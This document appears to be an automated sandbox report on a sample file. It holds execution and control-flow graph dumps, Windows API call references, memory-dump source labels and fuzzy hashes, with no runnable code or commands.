                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:20.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:28.2%
                                                                      Total number of Nodes:170
                                                                      Total number of Limit Nodes:10
                                                                      execution_graph 17307 c65587 17308 c655bf LdrInitializeThunk 17307->17308 17309 c655ba 17307->17309 17310 c65653 17308->17310 17309->17308 17311 c63460 17312 c6347c 17311->17312 17313 c63505 KiUserExceptionDispatcher 17312->17313 17330 c66111 17313->17330 17314 c63513 17334 c683c9 17314->17334 17315 c63536 17338 4ec0040 17315->17338 17342 4ec001e 17315->17342 17316 c63658 17346 4ec0488 17316->17346 17350 4ec0498 17316->17350 17317 c6365f 17354 4ec08e0 17317->17354 17358 4ec08f0 17317->17358 17318 c63666 17362 4ec5618 17318->17362 17367 4ec5628 17318->17367 17319 c636c1 17331 c66142 KiUserExceptionDispatcher 17330->17331 17333 c661fe 17331->17333 17333->17314 17337 c683fa 17334->17337 17335 c687df 17335->17315 17336 c68549 KiUserExceptionDispatcher 17336->17337 17337->17335 17337->17336 17339 4ec0062 KiUserExceptionDispatcher 17338->17339 17341 4ec011c 17339->17341 17341->17316 17343 4ec0028 KiUserExceptionDispatcher 17342->17343 17345 4ec011c 17343->17345 17345->17316 17347 4ec048c KiUserExceptionDispatcher 17346->17347 17349 4ec0574 17347->17349 17349->17317 17351 4ec04ba KiUserExceptionDispatcher 17350->17351 17353 4ec0574 17351->17353 17353->17317 17355 4ec08e8 KiUserExceptionDispatcher 17354->17355 17357 4ec09cc 17355->17357 17357->17318 17359 4ec0912 KiUserExceptionDispatcher 17358->17359 17361 4ec09cc 17359->17361 17361->17318 17363 4ec5642 17362->17363 17364 4ec5685 17363->17364 17372 4ec7968 17363->17372 17378 4ec7959 17363->17378 17364->17319 17369 4ec5642 17367->17369 17368 4ec5685 17368->17319 17369->17368 17370 4ec7968 5 API calls 17369->17370 17371 4ec7959 5 API calls 17369->17371 17370->17368 17371->17368 17373 4ec7984 17372->17373 17384 4ec149c 17373->17384 17379 4ec7984 17378->17379 17380 4ec149c 5 API calls 17379->17380 17381 4ec79a3 17380->17381 17382 4ec14ac 5 API calls 17381->17382 17383 4ec79c8 17382->17383 17383->17364 17385 4ec14a7 17384->17385 17392 4ec7a70 17385->17392 17386 4ec79a3 17388 4ec14ac 17386->17388 17391 4ec14b7 17388->17391 17389 4ece12c 17391->17389 17480 4ecd8ac 17391->17480 17394 4ec7a9e 17392->17394 17393 4ec7b29 17394->17393 17396 4ec15e8 17394->17396 17397 4ec15f3 17396->17397 17401 4ec8e60 17397->17401 17402 4ec89c0 17397->17402 17401->17393 17404 4ec89cb 17402->17404 17403 4ec8e27 17403->17401 17406 4ec89d0 17403->17406 17404->17403 17409 4ecaca8 17404->17409 17407 4ece010 SetTimer 17406->17407 17408 4ece07c 17407->17408 17408->17401 17410 4ecacd2 17409->17410 17422 4eca864 17410->17422 17413 4ecad50 17416 4ecad79 17413->17416 17437 4eca874 17413->17437 17418 4eca864 3 API calls 17418->17413 17423 4eca86f 17422->17423 17424 4ecad34 17423->17424 17450 4ecb798 17423->17450 17463 4ecb750 17423->17463 17424->17418 17427 4eca850 17424->17427 17432 4ecb178 17424->17432 17428 4eca855 17427->17428 17429 4ecb193 17428->17429 17430 4ecb798 2 API calls 17428->17430 17431 4ecb750 2 API calls 17428->17431 17429->17413 17430->17429 17431->17429 17434 4ecb188 17432->17434 17433 4ecb193 17433->17413 17434->17433 17435 4ecb798 2 API calls 17434->17435 17436 4ecb750 2 API calls 17434->17436 17435->17433 17436->17433 17438 4ecbac0 GetModuleHandleW 17437->17438 17440 4ecada3 17438->17440 17441 4ecbfc0 17440->17441 17447 4ecc0c8 17440->17447 17442 4ecbfd0 17441->17442 17444 4ecbfd4 17441->17444 17442->17416 17446 4ecbff0 17444->17446 17476 4ecb3fc 17444->17476 17446->17416 17448 4ecb3fc CreateWindowExW 17447->17448 17449 4ecc0fd 17448->17449 17449->17416 17451 4ecb79c 17450->17451 17452 4eca874 GetModuleHandleW 17451->17452 17454 4ecb7d1 17451->17454 17452->17454 17453 4ecb98d 17453->17424 17456 4ecb9e8 17453->17456 17458 4ecbb08 GetModuleHandleW 17453->17458 17454->17453 17455 4eca874 GetModuleHandleW 17454->17455 17457 4ecb913 17455->17457 17456->17424 17457->17453 17457->17456 17460 4eca874 GetModuleHandleW 17457->17460 17459 4ecbb35 17458->17459 17459->17424 17461 4ecb961 17460->17461 17461->17453 17462 4eca874 GetModuleHandleW 17461->17462 17462->17453 17464 4ecb755 17463->17464 17465 4eca874 GetModuleHandleW 17464->17465 17466 4ecb7d1 17464->17466 17465->17466 17467 4eca874 GetModuleHandleW 17466->17467 17475 4ecb98d 17466->17475 17469 4ecb913 17467->17469 17468 4ecb9e8 17468->17424 17469->17468 17472 4eca874 GetModuleHandleW 17469->17472 17469->17475 17470 4ecbb08 GetModuleHandleW 17471 4ecbb35 17470->17471 17471->17424 17473 4ecb961 17472->17473 17474 4eca874 GetModuleHandleW 17473->17474 17473->17475 17474->17475 17475->17424 17475->17468 17475->17470 17477 4ecc118 CreateWindowExW 17476->17477 17479 4ecc23c 17477->17479 17479->17479 17481 4ecd8b7 17480->17481 17482 4ec15e8 5 API calls 17481->17482 17483 4ece295 17482->17483 17483->17389 17484 4ecc2d0 17485 4ecc2d4 17484->17485 17490 4ecb414 17485->17490 17491 4ecb41f 17490->17491 17502 4ecb44c 17491->17502 17493 4ecc302 17494 4ecb424 17493->17494 17495 4ecb42f 17494->17495 17496 4ecdc51 17495->17496 17498 4ecdc41 17495->17498 17518 4ecd854 17496->17518 17508 4ecdd68 17498->17508 17513 4ecdd78 17498->17513 17499 4ecdc4f 17503 4ecb457 17502->17503 17504 4eca864 3 API calls 17503->17504 17505 4ecc469 17504->17505 17506 4eca874 GetModuleHandleW 17505->17506 17507 4ecc49b 17505->17507 17506->17507 17509 4ecdd78 17508->17509 17510 4ecdd8e 17509->17510 17511 4ecd854 CallWindowProcW 17509->17511 17510->17499 17512 4ecddcc 17511->17512 17512->17499 17514 4ecdd7c 17513->17514 17515 4ecdd8e 17514->17515 17516 4ecd854 CallWindowProcW 17514->17516 17515->17499 17517 4ecddcc 17516->17517 17517->17499 17519 4ecd85f 17518->17519 17520 4ecde7a CallWindowProcW 17519->17520 17521 4ecde29 17519->17521 17520->17521 17521->17499 17522 4ecc9b0 17523 4ecca16 17522->17523 17524 4eccac5 17523->17524 17526 4eccb70 17523->17526 17529 4ecb704 17526->17529 17530 4eccbd8 DuplicateHandle 17529->17530 17531 4eccb9e 17530->17531 17531->17524
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: N
                                                                      • API String ID: 0-1130791706
                                                                      • Opcode ID: a9f067ab60fe887b9720b58dbb98d5b0ed82b936cfc926874cd6226fbe13f845
                                                                      • Instruction ID: ec9e80826611af92999079a024858968b10c925599e5dbdd5bd17f1bdaf44716
                                                                      • Opcode Fuzzy Hash: a9f067ab60fe887b9720b58dbb98d5b0ed82b936cfc926874cd6226fbe13f845
                                                                      • Instruction Fuzzy Hash: BF73D631D10B598ECB21EF68C894AA9F7B1FF95304F11D69AE45877221EB70AAC4CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 550 c65587-c655b8 551 c655bf-c6564c LdrInitializeThunk 550->551 552 c655ba 550->552 553 c65653-c6571b 551->553 552->551 560 c65fb4-c65fd3 553->560 561 c65720-c6572c 560->561 562 c65fd9-c6600e 560->562 564 c65733-c65799 561->564 565 c6572e 561->565 569 c657a0-c6582d 564->569 570 c6579b 564->570 565->564 576 c6583f-c65846 569->576 577 c6582f-c65836 569->577 570->569 580 c6584d-c6585a 576->580 581 c65848 576->581 578 c6583d 577->578 579 c65838 577->579 578->580 579->578 582 c65861-c65868 580->582 583 c6585c 580->583 581->580 584 c6586f-c658c6 582->584 585 c6586a 582->585 583->582 588 c658cd-c658e4 584->588 589 c658c8 584->589 585->584 590 c658e6-c658ed 588->590 591 c658ef-c658f7 588->591 589->588 592 c658f8-c65902 590->592 591->592 593 c65904 592->593 594 c65909-c65912 592->594 593->594 595 c65f84-c65f8a 594->595 596 c65917-c65923 595->596 597 c65f90-c65faa 595->597 598 c65925 596->598 599 c6592a-c6592f 596->599 606 c65fb1 597->606 607 c65fac 597->607 598->599 600 c65972-c65974 599->600 601 c65931-c6593d 599->601 603 c6597a-c6598e 600->603 604 c65944-c65949 601->604 605 c6593f 601->605 608 c65994-c659a9 603->608 609 c65f62-c65f6f 603->609 604->600 610 c6594b-c65958 604->610 605->604 606->560 607->606 611 c659b0-c65a30 608->611 612 c659ab 608->612 613 c65f70-c65f7a 609->613 614 c6595f-c65970 610->614 615 c6595a 610->615 622 c65a32-c65a58 611->622 623 c65a5a 611->623 612->611 616 c65f81 613->616 617 c65f7c 613->617 614->603 615->614 616->595 617->616 624 c65a64-c65a78 622->624 623->624 626 c65bc1-c65bc6 624->626 627 c65a7e-c65a88 624->627 630 c65c2a-c65c2c 626->630 631 c65bc8-c65be8 626->631 628 c65a8f-c65aa9 627->628 629 c65a8a 627->629 632 c65ac0-c65ac2 628->632 633 c65aab-c65ab5 628->633 629->628 634 c65c32-c65c46 630->634 644 c65c12 631->644 645 c65bea-c65c10 631->645 640 c65b4c-c65b58 632->640 638 c65ab7 633->638 639 c65abc-c65abf 633->639 635 c65f5c-c65f5d 634->635 636 c65c4c-c65c56 634->636 643 c65f5e-c65f60 635->643 641 c65c5d-c65c77 636->641 642 c65c58 636->642 638->639 639->632 646 c65b5f-c65b64 640->646 647 c65b5a 640->647 648 c65c8e-c65c9c 641->648 649 c65c79-c65c83 641->649 642->641 643->613 650 c65c1c-c65c28 644->650 645->650 651 c65b66-c65b73 646->651 652 c65b8b-c65b8d 646->652 647->646 656 c65d2c-c65d38 648->656 654 c65c85 649->654 655 c65c8a-c65c8d 649->655 650->634 658 c65b75 651->658 659 c65b7a-c65b89 651->659 653 c65b93-c65ba1 652->653 660 c65ac7-c65adc 653->660 661 c65ba7-c65bbc 653->661 654->655 655->648 662 c65d3f-c65d44 656->662 663 c65d3a 656->663 658->659 659->653 666 c65ae3-c65b41 660->666 667 c65ade 660->667 661->643 664 c65d46-c65d53 662->664 665 c65d6b-c65d6d 662->665 663->662 668 c65d55 664->668 669 c65d5a-c65d69 664->669 670 c65d73-c65d87 665->670 686 c65b43 666->686 687 c65b48-c65b4b 666->687 667->666 668->669 669->670 671 c65ca1-c65cb9 670->671 672 c65d8d-c65df9 call c643f8 * 2 670->672 675 c65cc0-c65d21 671->675 676 c65cbb 671->676 684 c65e02-c65f58 672->684 685 c65dfb-c65dfd 672->685 691 c65d23 675->691 692 c65d28-c65d2b 675->692 676->675 688 c65f59-c65f5a 684->688 685->688 686->687 687->640 688->597 691->692 692->656
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d8acbcd9b263c4bb262d6116521e21b503d97b2511ca39dc9fdc46472f4d1e71
                                                                      • Instruction ID: 9e395aa2abdd858ad0a32d6b71fc2993ac492da4be7b936fed36b0c1aceb29c1
                                                                      • Opcode Fuzzy Hash: d8acbcd9b263c4bb262d6116521e21b503d97b2511ca39dc9fdc46472f4d1e71
                                                                      • Instruction Fuzzy Hash: 8362C074E00628CFDB64DFA9C884BDDBBB2BB99304F2485E9D409A7255D7709E81CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 705 4ecb798-4ecb7be 709 4ecb7ee-4ecb7f6 705->709 710 4ecb7c0-4ecb7e8 call 4eca874 call 4ecb384 705->710 712 4ecb83c-4ecb876 call 4ecb39c 709->712 713 4ecb7f8-4ecb7fd call 4ecb390 709->713 710->709 722 4ecb9f4-4ecba1a 710->722 731 4ecb87c-4ecb8c7 712->731 732 4ecba21-4ecba53 712->732 716 4ecb802-4ecb837 713->716 727 4ecb8ca-4ecb92c call 4eca874 call 4ecb3a8 716->727 722->732 757 4ecb9e8-4ecb9f3 727->757 758 4ecb932-4ecb93f 727->758 731->727 746 4ecba5a-4ecba7f 732->746 756 4ecba80-4ecba91 746->756 761 4ecba93-4ecba9e 756->761 762 4ecb9e4-4ecb9e6 758->762 763 4ecb945-4ecb972 call 4eca874 call 4ecb39c 758->763 764 4ecbaa4-4ecbb00 761->764 765 4ecbaa0-4ecbaa2 761->765 762->746 762->757 763->762 777 4ecb974-4ecb981 763->777 766 4ecbb08-4ecbb33 GetModuleHandleW 764->766 767 4ecbb02-4ecbb05 764->767 765->764 769 4ecbb3c-4ecbb50 766->769 770 4ecbb35-4ecbb3b 766->770 767->766 770->769 777->762 778 4ecb983-4ecb99a call 4eca874 call 4ecb3b4 777->778 783 4ecb99c-4ecb9a5 call 4ecb3a8 778->783 784 4ecb9a7-4ecb9d6 call 4ecb3a8 778->784 783->762 784->762 792 4ecb9d8-4ecb9e2 784->792 792->762 792->784
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: b2841f804eef0b7330b76cf5e9e494cfcea25238af10206d1568e8035c8a045d
                                                                      • Instruction ID: a1dc2b58ed2b615cdd42e34724e6d9b532ee2d50b66bf0050883bb1a36dadccb
                                                                      • Opcode Fuzzy Hash: b2841f804eef0b7330b76cf5e9e494cfcea25238af10206d1568e8035c8a045d
                                                                      • Instruction Fuzzy Hash: 53C16B74A007058FDB14DF69D491AAEBBF6EF88208B00992ED44ADB751DB34F946CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 822 c683c9-c683f8 823 c683ff-c684c2 call c666f8 call c66b88 822->823 824 c683fa 822->824 833 c687e0-c68812 823->833 834 c684c8-c684e0 823->834 824->823 837 c684e7-c684f0 834->837 838 c684e2 834->838 839 c687d3-c687d9 837->839 838->837 840 c684f5-c6856f KiUserExceptionDispatcher 839->840 841 c687df 839->841 845 c68575-c685e3 840->845 846 c6862b-c68686 840->846 841->833 855 c68626-c68629 845->855 856 c685e5-c68625 845->856 857 c68687-c686d5 call c643f8 * 2 846->857 855->857 856->855 864 c687be-c687c9 857->864 865 c686db-c687bd 857->865 866 c687d0 864->866 867 c687cb 864->867 865->864 866->839 867->866
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 00C6855B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: a9fb6a77891fcf29016d3f492aeaeac64c24f77f47c9e11e78161ca56bf91366
                                                                      • Instruction ID: 8f58c27311d0eaa607d943b0389e8f9d385d0cfcb03c5281dad6d722c948ae81
                                                                      • Opcode Fuzzy Hash: a9fb6a77891fcf29016d3f492aeaeac64c24f77f47c9e11e78161ca56bf91366
                                                                      • Instruction Fuzzy Hash: 80D1C378E00218CFDB64DFA5D994B9DBBB2BF88304F2085A9D409A7365DB355E85CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 880 c66111-c66140 881 c66147-c6620c KiUserExceptionDispatcher 880->881 882 c66142 880->882 888 c66212-c6622a 881->888 889 c6652a-c6655c 881->889 882->881 892 c66231-c6623a 888->892 893 c6622c 888->893 894 c6651d-c66523 892->894 893->892 895 c6623f-c662b9 894->895 896 c66529 894->896 901 c66375-c663d0 895->901 902 c662bf-c6632d 895->902 896->889 913 c663d1-c6641f call c643f8 * 2 901->913 911 c66370-c66373 902->911 912 c6632f-c6636f 902->912 911->913 912->911 920 c66425-c66507 913->920 921 c66508-c66513 913->921 920->921 922 c66515 921->922 923 c6651a 921->923 922->923 923->894
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 00C661EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 9e4795ff5fb4be0b671f09baa8762cd780f556be4364ba9b60a2ece47ab5156e
                                                                      • Instruction ID: af400a3a73363efbb8027d425cd3ecb2ac6bf64210a73dff76eb2fd13293c739
                                                                      • Opcode Fuzzy Hash: 9e4795ff5fb4be0b671f09baa8762cd780f556be4364ba9b60a2ece47ab5156e
                                                                      • Instruction Fuzzy Hash: CAD1C278E00218CFDB68DFA5D994B9DBBB2BF88304F2084A9D409A7365DB355E85CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 990 4ec0498-4ec04b8 991 4ec04bf-4ec056c KiUserExceptionDispatcher 990->991 992 4ec04ba 990->992 997 4ec0574-4ec0582 991->997 992->991 998 4ec0588-4ec059f 997->998 999 4ec089a-4ec08cc 997->999 1002 4ec05a6-4ec05af 998->1002 1003 4ec05a1 998->1003 1004 4ec088d-4ec0893 1002->1004 1003->1002 1005 4ec0899 1004->1005 1006 4ec05b4-4ec062a 1004->1006 1005->999 1011 4ec06e6-4ec0740 1006->1011 1012 4ec0630-4ec069e 1006->1012 1021 4ec0741-4ec078f 1011->1021 1022 4ec06a0-4ec06e0 1012->1022 1023 4ec06e1-4ec06e4 1012->1023 1028 4ec0878-4ec0883 1021->1028 1029 4ec0795-4ec0877 1021->1029 1022->1023 1023->1021 1031 4ec088a 1028->1031 1032 4ec0885 1028->1032 1029->1028 1031->1004 1032->1031
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 04EC0563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 99b734f9bd26af77b8262c98cac43b4e47c215921f9ad816710f34e87e244998
                                                                      • Instruction ID: 622c0de0e80a60ab7be5568c775017dc2e7d89e37c471a108af771ae1cf6dbc1
                                                                      • Opcode Fuzzy Hash: 99b734f9bd26af77b8262c98cac43b4e47c215921f9ad816710f34e87e244998
                                                                      • Instruction Fuzzy Hash: C3C1B178E00218CFDB64DFA5C994B9DBBB2BF89304F2094A9D409AB355DB355E82CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 936 4ec0040-4ec0060 937 4ec0067-4ec0114 KiUserExceptionDispatcher 936->937 938 4ec0062 936->938 943 4ec011c-4ec012a 937->943 938->937 944 4ec0130-4ec0147 943->944 945 4ec0442-4ec0474 943->945 948 4ec014e-4ec0157 944->948 949 4ec0149 944->949 950 4ec0435-4ec043b 948->950 949->948 951 4ec015c-4ec01d2 950->951 952 4ec0441 950->952 957 4ec028e-4ec02e8 951->957 958 4ec01d8-4ec0246 951->958 952->945 969 4ec02e9-4ec0337 957->969 967 4ec0248-4ec0288 958->967 968 4ec0289-4ec028c 958->968 967->968 968->969 974 4ec033d-4ec041f 969->974 975 4ec0420-4ec042b 969->975 974->975 976 4ec042d 975->976 977 4ec0432 975->977 976->977 977->950
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 04EC010B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 47f6cc1e4a52687b2a3679e580f16a00d6a80b7f922f67ba63e5ab1056ef5bf3
                                                                      • Instruction ID: 0ffdec858db4c694da40ad8bc5e43349f7beff488fd7627af88f6893bb51b316
                                                                      • Opcode Fuzzy Hash: 47f6cc1e4a52687b2a3679e580f16a00d6a80b7f922f67ba63e5ab1056ef5bf3
                                                                      • Instruction Fuzzy Hash: EDC1B374E00218CFDB64DFA5C954B9DBBB2BF89304F2095A9D809AB355DB355E82CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1044 4ec08f0-4ec0910 1045 4ec0917-4ec09c4 KiUserExceptionDispatcher 1044->1045 1046 4ec0912 1044->1046 1051 4ec09cc-4ec09da 1045->1051 1046->1045 1052 4ec09e0-4ec09f7 1051->1052 1053 4ec0cf2-4ec0d24 1051->1053 1056 4ec09fe-4ec0a07 1052->1056 1057 4ec09f9 1052->1057 1058 4ec0ce5-4ec0ceb 1056->1058 1057->1056 1059 4ec0a0c-4ec0a82 1058->1059 1060 4ec0cf1 1058->1060 1065 4ec0b3e-4ec0b98 1059->1065 1066 4ec0a88-4ec0af6 1059->1066 1060->1053 1077 4ec0b99-4ec0be7 1065->1077 1075 4ec0af8-4ec0b38 1066->1075 1076 4ec0b39-4ec0b3c 1066->1076 1075->1076 1076->1077 1082 4ec0bed-4ec0ccf 1077->1082 1083 4ec0cd0-4ec0cdb 1077->1083 1082->1083 1085 4ec0cdd 1083->1085 1086 4ec0ce2 1083->1086 1085->1086 1086->1058
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 04EC09BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: a6dd121ca4e7cbb8b1166b93f36e2f808605b9687701d05d0fb1d1729a59c04e
                                                                      • Instruction ID: 56fe211f03a02e4a40d23e305307336dc7b09419ba19b4ba216f2d9dff55aacf
                                                                      • Opcode Fuzzy Hash: a6dd121ca4e7cbb8b1166b93f36e2f808605b9687701d05d0fb1d1729a59c04e
                                                                      • Instruction Fuzzy Hash: 1EC1B174E00218CFDB64DFA5C994B9DBBB2BF89304F2094A9D809AB355DB355E82CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1364 4ec5850-4ec588f 1366 4ec58a5-4ec58ad 1364->1366 1367 4ec5891-4ec5898 1364->1367 1370 4ec58af-4ec58c7 1366->1370 1368 4ec589e-4ec58a3 1367->1368 1369 4ec589a-4ec589c 1367->1369 1368->1370 1369->1370 1373 4ec58dd-4ec58e9 1370->1373 1374 4ec58c9-4ec58d0 1370->1374 1377 4ec58eb-4ec58ee 1373->1377 1375 4ec58d6-4ec58db 1374->1375 1376 4ec58d2-4ec58d4 1374->1376 1375->1377 1376->1377 1379 4ec594c-4ec594f 1377->1379 1380 4ec58f0-4ec5905 1377->1380 1381 4ec5998-4ec599d 1379->1381 1382 4ec5951-4ec5966 1379->1382 1380->1379 1388 4ec5907-4ec590a 1380->1388 1383 4ec667a-4ec6c70 1381->1383 1384 4ec59a3-4ec59a5 1381->1384 1382->1381 1391 4ec5968-4ec596b 1382->1391 1399 4ec6c77-4ec6cc4 1383->1399 1400 4ec6c72 1383->1400 1384->1383 1386 4ec59ab-4ec59b0 1384->1386 1389 4ec665a-4ec665d 1386->1389 1390 4ec59b6 1386->1390 1393 4ec590c-4ec590e 1388->1393 1394 4ec5929-4ec5947 1388->1394 1395 4ec665f-4ec6662 1389->1395 1396 4ec6664-4ec6669 1389->1396 1390->1389 1397 4ec596d-4ec596f 1391->1397 1398 4ec5971-4ec5993 1391->1398 1393->1394 1401 4ec5910-4ec5913 1393->1401 1394->1379 1395->1396 1403 4ec666b 1395->1403 1404 4ec6670-4ec6677 1396->1404 1397->1381 1397->1398 1398->1381 1410 4ec7019-4ec7041 1399->1410 1411 4ec6cca-4ec6dd0 1399->1411 1400->1399 1401->1379 1405 4ec5915-4ec5927 1401->1405 1403->1404 1405->1379 1405->1394 1415 4ec7407-4ec742f 1410->1415 1416 4ec7047-4ec7327 1410->1416 1445 4ec6dfa 1411->1445 1446 4ec6dd2-4ec6dde 1411->1446 1421 4ec7435-4ec76a8 1415->1421 1422 4ec76e1 1415->1422 1523 4ec7329-4ec733e 1416->1523 1524 4ec7340-4ec7351 1416->1524 1537 4ec76ae call 4ec7708 1421->1537 1538 4ec76ae call 4ec7718 1421->1538 1424 4ec76e2-4ec76e8 1422->1424 1450 4ec6e00-4ec6fcf 1445->1450 1448 4ec6de8-4ec6dee 1446->1448 1449 4ec6de0-4ec6de6 1446->1449 1452 4ec6df8 1448->1452 1449->1452 1516 4ec6fde 1450->1516 1517 4ec6fd1-4ec6fdd 1450->1517 1452->1450 1519 4ec6fdf 1516->1519 1517->1516 1519->1519 1528 4ec7352-4ec7406 1523->1528 1524->1528 1525 4ec76b4-4ec76b6 1525->1424 1528->1415 1537->1525 1538->1525
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c591cd6a0c4b7f3307303857151bd5d14a024ea7e1c1c688185b30c97fcdf65d
                                                                      • Instruction ID: 5896a8b04467f259463565d5f052fba6efb0a677bf55a3018e76e9f9d893b0db
                                                                      • Opcode Fuzzy Hash: c591cd6a0c4b7f3307303857151bd5d14a024ea7e1c1c688185b30c97fcdf65d
                                                                      • Instruction Fuzzy Hash: 4AB211357852148FCF14DA9CE880ADD7B72EB66324FA153B5C409DBF61D63E9A838E40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1586 4ec001e-4ec0026 1587 4ec002c-4ec0036 1586->1587 1588 4ec0028-4ec002a 1586->1588 1589 4ec003c-4ec003f 1587->1589 1590 4ec0038-4ec003a 1587->1590 1588->1587 1591 4ec0040-4ec0060 1589->1591 1590->1589 1590->1591 1592 4ec0067-4ec0114 KiUserExceptionDispatcher 1591->1592 1593 4ec0062 1591->1593 1598 4ec011c-4ec012a 1592->1598 1593->1592 1599 4ec0130-4ec0147 1598->1599 1600 4ec0442-4ec0474 1598->1600 1603 4ec014e-4ec0157 1599->1603 1604 4ec0149 1599->1604 1605 4ec0435-4ec043b 1603->1605 1604->1603 1606 4ec015c-4ec01d2 1605->1606 1607 4ec0441 1605->1607 1612 4ec028e-4ec02e8 1606->1612 1613 4ec01d8-4ec0246 1606->1613 1607->1600 1624 4ec02e9-4ec0337 1612->1624 1622 4ec0248-4ec0288 1613->1622 1623 4ec0289-4ec028c 1613->1623 1622->1623 1623->1624 1629 4ec033d-4ec041f 1624->1629 1630 4ec0420-4ec042b 1624->1630 1629->1630 1631 4ec042d 1630->1631 1632 4ec0432 1630->1632 1631->1632 1632->1605
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 04EC010B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
